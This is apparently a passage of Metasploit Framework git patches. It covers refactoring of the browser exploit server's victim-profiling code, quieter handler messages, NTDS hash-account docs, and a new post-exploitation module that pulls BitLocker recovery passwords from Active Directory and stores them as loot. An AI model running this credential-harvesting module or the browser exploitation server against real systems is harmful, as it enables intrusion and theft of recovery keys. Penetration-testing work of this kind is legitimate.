           m.datastore['URIPATH'],
           "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         ]
-        order += 1
       end
 
       print_line
-      print_status("The following is a list of exploits that are ready for BrowserAutopwn.")
+      print_status("The following is a list of exploits that BrowserAutoPwn will consider using.")
       print_status("Exploits with the highest ranking and newest will be tried first.")
       print_line
       print_line table.to_s
     end
 
-
     def start_service
       super
+      show_ready_exploits
       print_status("Please use the following URL for the browser attack:")
       print_status("BrowserAutoPwn URL: #{self.get_uri}")
-#      $stderr.puts
-#      $stderr.puts bap_exploits.inspect
     end
 
   end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index bba5e70a4b..ae54676bcb 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -460,10 +460,6 @@ module Exploit::Remote::HttpServer
     @service_path ? @service_path.dup : nil
   end
 
-  def blah
-    @my_resources.inspect
-  end
-
   #
   # Return a full url of the form <tt>http://1.1.1.1:8080/resource/</tt>
   #
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index f66a947093..8d7dd0454c 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -108,8 +108,9 @@ module ReverseTcp
         else
           via = ""
         end
-
-        print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
+        unless datastore['MODULEOWNER'] == 'BAP'
+          print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
+        end
         break
       rescue
         ex = $!
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
index 1c4f635b8e..ef0ee4271b 100644
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -49,7 +49,9 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     stime = Time.now.to_f
-    print_status "Starting the payload handler..."
+    unless datastore['MODULEOWNER'] == 'BAP'
+      print_status "Starting the payload handler..."
+    end
     while(true)
       break if session_created? and datastore['ExitOnSession']
       break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )

From 39663a7e1887ef9399af1ff62edc7d9e5732df87 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 01:19:39 -0500
Subject: [PATCH 0026/1013] Some progress

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index ca75c309c0..5880dd1fd3 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -633,3 +633,13 @@ module Msf
 
   end
 end
+
+
+
+=begin
+
+TODO:
+Use notes to store client profiles, and then use framework.db.get_host(address: "10.6.0.121")
+to retrieve notes in order to look up a profile.
+
+=end

From 9cebe769c2863ef5e839c5ec5c0c346ce0255c03 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 01:29:24 -0500
Subject: [PATCH 0027/1013] Change plan

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 5880dd1fd3..2247f32749 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -639,7 +639,7 @@ end
 =begin
 
 TODO:
-Use notes to store client profiles, and then use framework.db.get_host(address: "10.6.0.121")
+Use notes to store client profiles, and then use framework.db.notes
 to retrieve notes in order to look up a profile.
 
 =end

From 96a9313e7e842ce730f2cd27067a0f4b402137f7 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 21 Jan 2014 12:53:45 +0000
Subject: [PATCH 0028/1013] Initial commit

---
 .../post/windows/gather/enum_ad_bitlocker.rb  | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/post/windows/gather/enum_ad_bitlocker.rb

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
new file mode 100644
index 0000000000..74b378eb73
--- /dev/null
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::LDAP
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'	       => 'Windows Gather Active Directory Bitlocker Recovery',
+        'Description'  => %Q{
+            This module will enumerate bitlocker reocvery passwords in the default AD
+            directory. Requires Domain Admin or other delegated privileges.
+        },
+        'License'      => MSF_LICENSE,
+        'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
+        'Platform'     => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'References'   =>
+        [
+          ['URL', 'tbc'],
+        ]
+      ))
+
+    register_options([
+      OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 50]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
+      OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
+      OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
+    ], self.class)
+  end
+
+  def run
+    fields = datastore['FIELDS'].gsub(/\s+/,"").split(',')
+    search_filter = datastore['FILTER']
+    max_search = datastore['MAX_SEARCH']
+    q = query(search_filter, max_search, fields)
+
+    if q.nil? or q[:results].empty?
+      return
+    end
+
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+        'Header'     => "Bitlocker Recovery Passwords",
+        'Indent'     => 1,
+        'SortIndex'  => -1,
+        'Columns'    => fields
+      )
+
+    # Reports are collections for easy database insertion
+    reports = []
+    q[:results].each do |result|
+      row = []
+
+      report = {}
+      0.upto(fields.length-1) do |i|
+        if result[i].nil?
+          field = ""
+        else
+          field = result[i]
+        end
+
+        row << field
+      end
+
+      reports << report
+      results_table << row
+    end
+
+    print_line results_table.to_s
+    if datastore['STORE_LOOT']
+      stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv)
+      print_status("Results saved to: #{stored_path}")
+    end
+  end
+
+end
+

From 0d81ad4db437cdfd42d1272664a70b832cbc306a Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 24 Jan 2014 00:26:18 +0000
Subject: [PATCH 0029/1013] Remove max search

---
 modules/post/windows/gather/enum_ad_bitlocker.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index 74b378eb73..1afa686ad1 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -30,7 +30,6 @@ class Metasploit3 < Msf::Post
       ))
 
     register_options([
-      OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 50]),
       OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
       OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
       OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])

From 7e5b03c44ef1884ab95da34ac5c523337210b33c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 29 Apr 2015 09:48:44 +0100
Subject: [PATCH 0030/1013] Tidyup and update for new ADSI format

---
 .../post/windows/gather/enum_ad_bitlocker.rb  | 67 ++++++++-----------
 1 file changed, 28 insertions(+), 39 deletions(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index 1afa686ad1..7dd102d0c6 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -8,69 +8,60 @@ require 'msf/core'
 require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
-
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::LDAP
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'	       => 'Windows Gather Active Directory Bitlocker Recovery',
-        'Description'  => %Q{
-            This module will enumerate bitlocker reocvery passwords in the default AD
-            directory. Requires Domain Admin or other delegated privileges.
-        },
-        'License'      => MSF_LICENSE,
-        'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
-        'Platform'     => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter' ],
-        'References'   =>
-        [
-          ['URL', 'tbc'],
-        ]
-      ))
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Active Directory Bitlocker Recovery',
+      'Description'  => %(
+          This module will enumerate bitlocker reocvery passwords in the default AD
+          directory. Requires Domain Admin or other delegated privileges.
+                              ),
+      'License'      => MSF_LICENSE,
+      'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+      [
+        ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
+      ]
+    ))
 
     register_options([
-      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
       OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
       OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
     ], self.class)
   end
 
   def run
-    fields = datastore['FIELDS'].gsub(/\s+/,"").split(',')
+    fields = datastore['FIELDS'].gsub(/\s+/, "").split(',')
     search_filter = datastore['FILTER']
     max_search = datastore['MAX_SEARCH']
     q = query(search_filter, max_search, fields)
 
-    if q.nil? or q[:results].empty?
+    if q.nil? || q[:results].empty?
+      print_status('No results found...')
       return
     end
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
-        'Header'     => "Bitlocker Recovery Passwords",
-        'Indent'     => 1,
-        'SortIndex'  => -1,
-        'Columns'    => fields
-      )
+      'Header'     => 'Bitlocker Recovery Passwords',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => fields
+    )
 
-    # Reports are collections for easy database insertion
-    reports = []
     q[:results].each do |result|
       row = []
 
-      report = {}
-      0.upto(fields.length-1) do |i|
-        if result[i].nil?
-          field = ""
-        else
-          field = result[i]
-        end
-
-        row << field
+      result.each do |field|
+        field_value = (field.nil? ? '' : field[:value])
+        row << field_value
       end
 
-      reports << report
       results_table << row
     end
 
@@ -80,6 +71,4 @@ class Metasploit3 < Msf::Post
       print_status("Results saved to: #{stored_path}")
     end
   end
-
 end
-

From 4072cbd4d3912a85e7e833b3d170379f23162cac Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 29 Apr 2015 10:02:21 +0100
Subject: [PATCH 0031/1013] Bitlocker -> BitLocker

---
 modules/post/windows/gather/enum_ad_bitlocker.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index 7dd102d0c6..05e2833546 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -13,11 +13,11 @@ class Metasploit3 < Msf::Post
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'         => 'Windows Gather Active Directory Bitlocker Recovery',
+      'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
       'Description'  => %(
-          This module will enumerate bitlocker reocvery passwords in the default AD
+          This module will enumerate BitLocker reocvery passwords in the default AD
           directory. Requires Domain Admin or other delegated privileges.
-                              ),
+      ),
       'License'      => MSF_LICENSE,
       'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
       'Platform'     => [ 'win' ],
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Post
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
-      'Header'     => 'Bitlocker Recovery Passwords',
+      'Header'     => 'BitLocker Recovery Passwords',
       'Indent'     => 1,
       'SortIndex'  => -1,
       'Columns'    => fields

From eb8fdcc2f264bf25e612ba29ede7300fa651b5bf Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 29 Apr 2015 10:45:49 +0100
Subject: [PATCH 0032/1013] Typo

---
 modules/post/windows/gather/enum_ad_bitlocker.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index 05e2833546..b251c602d4 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post
     super(update_info(info,
       'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
       'Description'  => %(
-          This module will enumerate BitLocker reocvery passwords in the default AD
+          This module will enumerate BitLocker recovery passwords in the default AD
           directory. Requires Domain Admin or other delegated privileges.
       ),
       'License'      => MSF_LICENSE,

From 943fc18092e49f036f7fb28d72eacdb6b44b4d98 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 11:04:54 -0500
Subject: [PATCH 0033/1013] Take apart browser profiling

---
 .../exploit/remote/browser_exploit_server.rb  | 60 +------------------
 1 file changed, 2 insertions(+), 58 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 2247f32749..df66ec88c2 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -6,6 +6,7 @@ require 'date'
 require 'set'
 require 'rex/exploitation/js'
 require 'msf/core/exploit/jsobfu'
+require 'msf/core/exploit/remote/browser_profile_manager'
 
 ###
 #
@@ -25,6 +26,7 @@ module Msf
     include Msf::Exploit::Remote::HttpServer::HTML
     include Msf::Exploit::RopDb
     include Msf::Exploit::JSObfu
+    include Msf::Exploit::Remote::BrowserProfileManager
 
     # this must be static between runs, otherwise the older cookies will be ignored
     DEFAULT_COOKIE_NAME = '__ua'
@@ -81,9 +83,6 @@ module Msf
       # The mixin keeps 'target' so module doesn't lose it.
       @target = target
 
-      # See get_profile's documentation to understand what @target_profiles stores
-      @target_profiles = {}
-
       # Requirements are conditions that the browser must have in order to be exploited.
       @requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
 
@@ -237,61 +236,6 @@ module Msf
       bad_reqs
     end
 
-    # Returns the target profile based on the tag. Each profile has the following structure:
-    # 'cookie_name' =>
-    # {
-    #   :os_name   => 'Windows 7'
-    #   ...... etc ......
-    # }
-    # A profile should at least have info about the following:
-    # :source    : The data source. Either from 'script', or 'headers'. The 'script' source
-    #              should be more accurate in some scenarios like browser compatibility mode
-    # :ua_name   : The name of the browser
-    # :ua_ver    : The version of the browser (not yet implemented)
-    # :os_name   : The name of the OS ("Windows XP")
-    # :language  : The system's language
-    # :arch      : The system's arch
-    # :proxy     : Indicates whether proxy is used
-    #
-    # For more info about what the actual value might be for each key, see HttpServer.
-    #
-    # If the source is 'script', the profile might have even more information about plugins:
-    # 'office'       : The version of Microsoft Office (IE only)
-    # 'activex'      : Whether a specific set of clsid & method is available from an ActiveX control (IE only)
-    # 'java'         : The Java version
-    # 'mshtml_build' : The MSHTML build version
-    # 'flash'        : The Flash version
-    # 'silverlight'  : The Silverlight version
-    #
-    # @param tag [String] Either a cookie or IP + User-Agent
-    # @return [Hash] The profile found. If not found, returns nil
-    def get_profile(tag)
-      sync do
-        return @target_profiles[tag]
-      end
-    end
-
-
-    # Updates information for a specific profile
-    #
-    # @param target_profile [Hash] The profile to update
-    # @param key [Symbol] The symbol to use for the hash
-    # @param value [String] The value to assign
-    def update_profile(target_profile, key, value)
-      sync do
-        target_profile[key] = value
-      end
-    end
-
-
-    # Initializes a profile, if it did not previously exist
-    #
-    # @param tag [String] A unique string as a way to ID the profile
-    def init_profile(tag)
-      sync do
-        @target_profiles[tag] ||= {}
-      end
-    end
 
 
     # Retrieves a tag.

From c18c5c7b6e05c759b903fade266ca0e2589a939c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 11:06:00 -0500
Subject: [PATCH 0034/1013] Actually take apart profiling?

---
 .../exploit/remote/browser_profile_manager.rb | 69 +++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 lib/msf/core/exploit/remote/browser_profile_manager.rb

diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
new file mode 100644
index 0000000000..9867a329cc
--- /dev/null
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -0,0 +1,69 @@
+module Msf
+  module Exploit::Remote::BrowserProfileManager
+  	def initialize(info={})
+  		super
+  		# See get_profile's documentation to understand what @target_profiles stores
+  		@target_profiles = {}
+  	end
+
+
+    # Returns the target profile based on the tag. Each profile has the following structure:
+    # 'cookie_name' =>
+    # {
+    #   :os_name   => 'Windows 7'
+    #   ...... etc ......
+    # }
+    # A profile should at least have info about the following:
+    # :source    : The data source. Either from 'script', or 'headers'. The 'script' source
+    #              should be more accurate in some scenarios like browser compatibility mode
+    # :ua_name   : The name of the browser
+    # :ua_ver    : The version of the browser (not yet implemented)
+    # :os_name   : The name of the OS ("Windows XP")
+    # :language  : The system's language
+    # :arch      : The system's arch
+    # :proxy     : Indicates whether proxy is used
+    #
+    # For more info about what the actual value might be for each key, see HttpServer.
+    #
+    # If the source is 'script', the profile might have even more information about plugins:
+    # 'office'       : The version of Microsoft Office (IE only)
+    # 'activex'      : Whether a specific set of clsid & method is available from an ActiveX control (IE only)
+    # 'java'         : The Java version
+    # 'mshtml_build' : The MSHTML build version
+    # 'flash'        : The Flash version
+    # 'silverlight'  : The Silverlight version
+    #
+    # @param tag [String] Either a cookie or IP + User-Agent
+    # @return [Hash] The profile found. If not found, returns nil
+    def get_profile(tag)
+      sync do
+        return @target_profiles[tag]
+      end
+    end
+
+
+    # Updates information for a specific profile
+    #
+    # @param target_profile [Hash] The profile to update
+    # @param key [Symbol] The symbol to use for the hash
+    # @param value [String] The value to assign
+    def update_profile(target_profile, key, value)
+      sync do
+        target_profile[key] = value
+      end
+    end
+
+
+    # Initializes a profile, if it did not previously exist
+    #
+    # @param tag [String] A unique string as a way to ID the profile
+    def init_profile(tag)
+      sync do
+        @target_profiles[tag] ||= {}
+      end
+    end
+
+
+    
+  end
+end
\ No newline at end of file

From 1f66840533da90b06f2dc93d9aa1a45b52e0e282 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Wed, 29 Apr 2015 12:53:54 -0500
Subject: [PATCH 0035/1013] add YARD docs to NTDS Account

added yard around the attrs for the NTDS::Account
class

MSP-12357
---
 lib/metasploit/framework/ntds/account.rb | 73 +++++++++++++++++++-----
 1 file changed, 60 insertions(+), 13 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index 2ac1cd44a1..70859c0e72 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -5,26 +5,73 @@ module Metasploit
       # priv extension.
       class Account
 
-        attr_accessor :name
+        # @!attribute description
+        #   @return [String] The AD Account Description
         attr_accessor :description
-        attr_accessor :rid
+        # @!attribute disabled
+        #   @return [TrueClass] If the AD account is disabled
+        #   @return [FalseClass] If the AD account is not disabled
         attr_accessor :disabled
-        attr_accessor :locked
-        attr_accessor :no_pass
-        attr_accessor :no_expire
+        # @!attribute expired
+        #   @return [TrueClass] If the AD account password is expired
+        #   @return [FalseClass] If the AD account password is not expired
         attr_accessor :expired
-        attr_accessor :logon_count
-        attr_accessor :nt_history_count
-        attr_accessor :lm_history_count
+        # @!attribute expiry_date
+        #   @return [String] Human Readable Date for the account's password expiration
         attr_accessor :expiry_date
-        attr_accessor :logon_date
-        attr_accessor :logon_time
-        attr_accessor :pass_date
-        attr_accessor :pass_time
+        # @!attribute lm_hash
+        #   @return [String] The LM Hash of the current password
         attr_accessor :lm_hash
-        attr_accessor :nt_hash
+        # @!attribute lm_history
+        #   @return [Array<String>] The LM hashes for previous passwords, up to 24
         attr_accessor :lm_history
+        # @!attribute lm_history_count
+        #   @return [Fixnum] The count of historical LM hashes
+        attr_accessor :lm_history_count
+        # @!attribute locked
+        #   @return [TrueClass] If the AD account is locked
+        #   @return [FalseClass] If the AD account is not locked
+        attr_accessor :locked
+        # @!attribute logon_count
+        #   @return [Fixnum] The number of times this account has logged in
+        attr_accessor :logon_count
+        # @!attribute logon_date
+        #   @return [String] Human Readable Date for the last time the account logged in
+        attr_accessor :logon_date
+        # @!attribute logon_time
+        #   @return [String] Human Readable Time for the last time the account logged in
+        attr_accessor :logon_time
+        # @!attribute name
+        #   @return [String] The samAccountName of the account
+        attr_accessor :name
+        # @!attribute no_expire
+        #   @return [TrueClass] If the AD account password does not expire
+        #   @return [FalseClass] If the AD account password does expire
+        attr_accessor :no_expire
+        # @!attribute no_pass
+        #   @return [TrueClass] If the AD account does not require a password
+        #   @return [FalseClass] If the AD account does require a password
+        attr_accessor :no_pass
+        # @!attribute nt_hash
+        #   @return [String] The NT Hash of the current password
+        attr_accessor :nt_hash
+        # @!attribute nt_history
+        #   @return [Array<String>] The NT hashes for previous passwords, up to 24
         attr_accessor :nt_history
+        # @!attribute nt_history_count
+        #   @return [Fixnum] The count of historical NT hashes
+        attr_accessor :nt_history_count
+        # @!attribute pass_date
+        #   @return [String] Human Readable Date for the last password change
+        attr_accessor :pass_date
+        # @!attribute pass_time
+        #   @return [String] Human Readable Time for the last password change
+        attr_accessor :pass_time
+        # @!attribute rid
+        #   @return [Fixnum] The Relative ID of the account
+        attr_accessor :rid
+        # @!attribute sid
+        #   @return [String] Byte String for the Account's SID
         attr_accessor :sid
 
 

From 2847bc8a6b00750634fb65b2919d79da3ab2411d Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Wed, 29 Apr 2015 14:53:08 -0500
Subject: [PATCH 0036/1013] a little more yard

---
 lib/metasploit/framework/ntds/account.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index 70859c0e72..cefeca15e7 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -74,7 +74,8 @@ module Metasploit
         #   @return [String] Byte String for the Account's SID
         attr_accessor :sid
 
-
+        # @param raw_data [String] the raw 3948 byte string from the wire
+        # @raise [ArgumentErrror] if a 3948 byte string is not supplied
         def initialize(raw_data)
           raise ArgumentError, "No Data Supplied" unless raw_data.present?
           raise ArgumentError, "Invalid Data" unless raw_data.length == 3948

From f3e026db6c48b56a8b62e5457a80a0e772b4a0e7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 18:45:08 -0500
Subject: [PATCH 0037/1013] Profile sharing works for the first time

---
 .../exploit/remote/browser_exploit_server.rb  | 51 ++++++-----
 .../exploit/remote/browser_profile_manager.rb | 87 +++++++------------
 2 files changed, 62 insertions(+), 76 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index df66ec88c2..bd7d1005bc 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -154,9 +154,9 @@ module Msf
     # @param reqs [Hash] A hash that contains data for the requirements
     # @return [Hash] A hash of requirements
     def extract_requirements(reqs)
-      tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_sym)}
+      tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_s)}
       # Make sure keys are always symbols
-      Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
+      Hash[tmp.map{|(k,v)| [k.to_s,v]}]
     end
 
 
@@ -214,22 +214,23 @@ module Msf
     # @param profile [Hash] The profile to check
     # @return [Array] An array of requirements not met
     def get_bad_requirements(profile)
+      profile = profile.first[1]
       bad_reqs = []
 
       @requirements.each do |k, v|
         expected = k != :vuln_test ? v : 'true'
-        vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_sym]}")
+        vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_s]}")
 
         if k == :activex
-          bad_reqs << k if has_bad_activex?(profile[k.to_sym])
+          bad_reqs << k if has_bad_activex?(profile[k.to_s])
         elsif k == :vuln_test
-          bad_reqs << k unless profile[k.to_sym].to_s == 'true'
+          bad_reqs << k unless profile[k.to_s].to_s == 'true'
         elsif v.is_a? Regexp
-          bad_reqs << k if profile[k.to_sym] !~ v
+          bad_reqs << k if profile[k.to_s] !~ v
         elsif v.is_a? Proc
-          bad_reqs << k unless v.call(profile[k.to_sym])
+          bad_reqs << k unless v.call(profile[k.to_s])
         else
-          bad_reqs << k if profile[k.to_sym] != v
+          bad_reqs << k if profile[k.to_s] != v
         end
       end
 
@@ -246,7 +247,9 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     def retrieve_tag(cli, request)
       cookie = CGI::Cookie.parse(request.headers['Cookie'].to_s)
+      #$stderr.puts "Found cookie: #{cookie.inspect}"
       tag = cookie.has_key?(cookie_name) && cookie[cookie_name].first
+      #$stderr.puts "Found tag: #{tag}"
 
       if tag.blank?
         # Browser probably doesn't allow cookies, plan B :-/
@@ -269,9 +272,10 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     def process_browser_info(source, cli, request)
       tag = retrieve_tag(cli, request)
-      init_profile(tag)
-      target_info = get_profile(tag)
-      update_profile(target_info, :source, source.to_s)
+      update_profile(tag, :source, source.to_s)
+
+      found_ua_name = ''
+      found_ua_ver  = ''
 
       # Gathering target info from the detection stage
       case source
@@ -279,7 +283,9 @@ module Msf
         # Gathers target data from a POST request
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
         vprint_debug("Received sniffed browser data over POST: \n#{parsed_body}.")
-        parsed_body.each { |k, v| update_profile(target_info, k.to_sym, v.first) }
+        parsed_body.each { |k, v| update_profile(tag, k.to_s, v.first) }
+        found_ua_name = parsed_body['ua_name']
+        found_ua_ver = parsed_body['ua_ver']
       when :headers
         # Gathers target data from headers
         # This may be less accurate, and most likely less info.
@@ -288,19 +294,21 @@ module Msf
         # Kill this to save space.
         fp.delete(:ua_string)
         fp.each do |k, v|
-          update_profile(target_info, k.to_sym, v)
+          update_profile(tag, k.to_s, v)
         end
+        found_ua_name = fp[:ua_name]
+        found_ua_ver = fp[:ua_ver]
       end
 
       # Other detections
-      update_profile(target_info, :proxy, has_proxy?(request))
-      update_profile(target_info, :language, request.headers['Accept-Language'] || '')
+      update_profile(tag, :proxy, has_proxy?(request))
+      update_profile(tag, :language, request.headers['Accept-Language'] || '')
 
       report_client({
         :host      => cli.peerhost,
         :ua_string => request.headers['User-Agent'],
-        :ua_name   => target_info[:ua_name],
-        :ua_ver    => target_info[:ua_ver]
+        :ua_name   => found_ua_name,
+        :ua_ver    => found_ua_ver
       })
     end
 
@@ -402,6 +410,7 @@ module Msf
       datastore['CookieName'] || DEFAULT_COOKIE_NAME
     end
 
+
     def cookie_header(tag)
       cookie = "#{cookie_name}=#{tag};"
       if datastore['CookieExpiration'].present?
@@ -423,7 +432,7 @@ module Msf
         #
         # This is the information gathering stage
         #
-        if get_profile(retrieve_tag(cli, request))
+        unless get_profile_info(retrieve_tag(cli, request)).empty?
           send_redirect(cli, get_module_resource)
           return
         end
@@ -459,15 +468,15 @@ module Msf
         #
         tag = retrieve_tag(cli, request)
         vprint_status("Serving exploit to user with tag #{tag}")
-        profile = get_profile(tag)
-        if profile.nil?
+        profile = get_profile_info(tag)
+        if profile.empty?
           print_status("Browsing directly to the exploit URL is forbidden.")
           send_not_found(cli)
         elsif profile[:tried] and datastore['Retries'] == false
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
           send_not_found(cli)
         else
-          update_profile(profile, :tried, true)
+          update_profile(tag, :tried, true)
           vprint_status("Setting target \"#{tag}\" to :tried.")
           try_set_target(profile)
           bad_reqs = get_bad_requirements(profile)
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index 9867a329cc..3e295c65de 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
